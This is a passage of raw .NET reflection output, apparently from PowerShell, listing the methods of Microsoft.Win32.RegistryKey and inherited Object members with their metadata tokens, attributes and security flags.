Void ReturnParameter : Void IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]} Name : OpenBaseKey DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663562 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, Static, HideBySig CallingConvention : Standard ReturnType : Microsoft.Win32.RegistryKey ReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey ReturnParameter : Microsoft.Win32.RegistryKey IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : True IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()], [System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]} Name : OpenRemoteBaseKey DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663563 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : False IsSecuritySafeCritical : False IsSecurityTransparent : True MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, Static, HideBySig CallingConvention : Standard ReturnType : Microsoft.Win32.RegistryKey ReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey ReturnParameter : Microsoft.Win32.RegistryKey IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : True IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {} Name : OpenRemoteBaseKey DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663564 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, Static, HideBySig CallingConvention : Standard ReturnType : Microsoft.Win32.RegistryKey ReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey ReturnParameter : Microsoft.Win32.RegistryKey IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : True IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)], [System.Security.SecuritySafeCriticalAttribute()]} Name : OpenSubKey DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663565 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : Microsoft.Win32.RegistryKey ReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey ReturnParameter : Microsoft.Win32.RegistryKey IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]} Name : OpenSubKey DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663566 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : Microsoft.Win32.RegistryKey ReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey ReturnParameter : Microsoft.Win32.RegistryKey IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()], [System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]} Name : OpenSubKey DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663567 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : Microsoft.Win32.RegistryKey ReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey ReturnParameter : Microsoft.Win32.RegistryKey IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()], [System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]} Name : OpenSubKey DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663568 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : Microsoft.Win32.RegistryKey ReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey ReturnParameter : Microsoft.Win32.RegistryKey IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()], [System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]} Name : OpenSubKey DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663571 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : False IsSecuritySafeCritical : False IsSecurityTransparent : True MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : Microsoft.Win32.RegistryKey ReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey ReturnParameter : Microsoft.Win32.RegistryKey IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {} Name : get_SubKeyCount DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663572 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig, SpecialName CallingConvention : Standard, HasThis ReturnType : System.Int32 ReturnTypeCustomAttributes : Int32 ReturnParameter : Int32 IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : True IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]} Name : get_View DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663573 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig, SpecialName CallingConvention : Standard, HasThis ReturnType : Microsoft.Win32.RegistryView ReturnTypeCustomAttributes : Microsoft.Win32.RegistryView ReturnParameter : Microsoft.Win32.RegistryView IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : True IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]} Name : get_Handle DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663574 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : False IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig, SpecialName, HasSecurity CallingConvention : Standard, HasThis ReturnType : Microsoft.Win32.SafeHandles.SafeRegistryHandle ReturnTypeCustomAttributes : Microsoft.Win32.SafeHandles.SafeRegistryHandle ReturnParameter : Microsoft.Win32.SafeHandles.SafeRegistryHandle IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : True IsConstructor : False CustomAttributes : {[System.Security.Permissions.SecurityPermissionAttribute()], [System.Security.SecurityCriticalAttribute()]} Name : FromHandle DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663575 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : False IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, Static, HideBySig, HasSecurity CallingConvention : Standard ReturnType : Microsoft.Win32.RegistryKey ReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey ReturnParameter : Microsoft.Win32.RegistryKey IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : True IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.Permissions.SecurityPermissionAttribute()], [System.Security.SecurityCriticalAttribute()], [System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]} Name : FromHandle DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663576 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : False IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, Static, HideBySig, HasSecurity CallingConvention : Standard ReturnType : Microsoft.Win32.RegistryKey ReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey ReturnParameter : Microsoft.Win32.RegistryKey IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : True IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.Permissions.SecurityPermissionAttribute()], [System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)], [System.Security.SecurityCriticalAttribute()]} Name : GetSubKeyNames DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663578 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.String[] ReturnTypeCustomAttributes : System.String[] ReturnParameter : System.String[] IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]} Name : get_ValueCount DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663580 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig, SpecialName CallingConvention : Standard, HasThis ReturnType : System.Int32 ReturnTypeCustomAttributes : Int32 ReturnParameter : Int32 IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : True IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]} Name : GetValueNames DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663582 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.String[] ReturnTypeCustomAttributes : System.String[] ReturnParameter : System.String[] IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]} Name : GetValue DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663583 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.Object ReturnTypeCustomAttributes : System.Object ReturnParameter : System.Object IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]} Name : GetValue DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663584 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.Object ReturnTypeCustomAttributes : System.Object ReturnParameter : System.Object IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]} Name : GetValue DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663585 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.Object ReturnTypeCustomAttributes : System.Object ReturnParameter : System.Object IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)], [System.Security.SecuritySafeCriticalAttribute()]} Name : GetValueKind DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663587 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : Microsoft.Win32.RegistryValueKind ReturnTypeCustomAttributes : Microsoft.Win32.RegistryValueKind ReturnParameter : Microsoft.Win32.RegistryValueKind IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)], [System.Security.SecuritySafeCriticalAttribute()]} Name : get_Name DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663592 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig, SpecialName CallingConvention : Standard, HasThis ReturnType : System.String ReturnTypeCustomAttributes : System.String ReturnParameter : System.String IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : True IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]} Name : SetValue DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663594 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : False IsSecuritySafeCritical : False IsSecurityTransparent : True MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.Void ReturnTypeCustomAttributes : Void ReturnParameter : Void IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {} Name : SetValue DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663595 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.Void ReturnTypeCustomAttributes : Void ReturnParameter : Void IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)], [System.Security.SecuritySafeCriticalAttribute()]} Name : ToString DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663597 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, Virtual, HideBySig CallingConvention : Standard, HasThis ReturnType : System.String ReturnTypeCustomAttributes : System.String ReturnParameter : System.String IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : True IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]} Name : GetAccessControl DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663598 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : False IsSecuritySafeCritical : False IsSecurityTransparent : True MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.Security.AccessControl.RegistrySecurity ReturnTypeCustomAttributes : System.Security.AccessControl.RegistrySecurity ReturnParameter : System.Security.AccessControl.RegistrySecurity IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {} Name : GetAccessControl DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663599 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.Security.AccessControl.RegistrySecurity ReturnTypeCustomAttributes : System.Security.AccessControl.RegistrySecurity ReturnParameter : System.Security.AccessControl.RegistrySecurity IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]} Name : SetAccessControl DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663600 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.Void ReturnTypeCustomAttributes : Void ReturnParameter : Void IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]} Name : GetLifetimeService DeclaringType : System.MarshalByRefObject ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100667337 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : False IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, Final, Virtual, HideBySig, VtableLayoutMask CallingConvention : Standard, HasThis ReturnType : System.Object ReturnTypeCustomAttributes : System.Object ReturnParameter : System.Object IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : True IsVirtual : True IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecurityCriticalAttribute()]} Name : InitializeLifetimeService DeclaringType : System.MarshalByRefObject ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100667338 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : False IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, Virtual, HideBySig, VtableLayoutMask CallingConvention : Standard, HasThis ReturnType : System.Object ReturnTypeCustomAttributes : System.Object ReturnParameter : System.Object IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : True IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecurityCriticalAttribute()]} Name : CreateObjRef DeclaringType : System.MarshalByRefObject ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100667339 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : False IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, Virtual, HideBySig, VtableLayoutMask CallingConvention : Standard, HasThis ReturnType : System.Runtime.Remoting.ObjRef ReturnTypeCustomAttributes : System.Runtime.Remoting.ObjRef ReturnParameter : System.Runtime.Remoting.ObjRef IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : True IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecurityCriticalAttribute()]} Name : Equals DeclaringType : System.Object ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663839 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : False IsSecuritySafeCritical : False IsSecurityTransparent : True MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, Virtual, HideBySig, VtableLayoutMask CallingConvention : Standard, HasThis ReturnType : System.Boolean ReturnTypeCustomAttributes : Boolean ReturnParameter : Boolean IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : True IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[__DynamicallyInvokableAttribute()]} Name : GetHashCode DeclaringType : System.Object ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663842 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : False IsSecuritySafeCritical : False IsSecurityTransparent : True MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, Virtual, HideBySig, VtableLayoutMask CallingConvention : Standard, HasThis ReturnType : System.Int32 ReturnTypeCustomAttributes : Int32 ReturnParameter : Int32 IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : True IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[__DynamicallyInvokableAttribute()]} Name : GetType DeclaringType : System.Object ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663843 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.Type ReturnTypeCustomAttributes : System.Type ReturnParameter : System.Type IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : InternalCall IsPublic : True IsPrivate 